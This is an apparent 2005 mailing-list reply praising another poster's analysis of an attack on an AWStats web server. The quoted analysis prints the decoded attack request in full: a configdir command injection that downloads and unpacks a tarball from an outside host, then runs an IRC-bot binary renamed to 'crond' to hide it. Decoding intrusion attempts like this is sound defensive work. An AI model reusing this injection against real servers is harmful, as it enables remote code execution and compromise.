On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote: > Replace the url-encoded characters and you get: > > /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget > zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv > mech crond;export PATH=;crond;echo e_exp;%00 > > So the attacker has tricked the script into executing a set of shell > commands, which include changing directory to /tmp, downloading a > tarball from a Romanian site, extracting that tarball and then executing > a program from the downloaded and extracted tarball, after renaming it > to "crond" in an effort to disguise it. Damned fine research. Good job; I'm impressed. -- ------------------------------------------------------------------------ Brian FahrlÃnder Christian, Conservative, and Technomad Evansville, IN http://www.fahrlander.net ICQ: 5119262 AIM: WheelDweller ------------------------------------------------------------------------
Attachment:
signature.asc
Description: This is a digitally signed message part
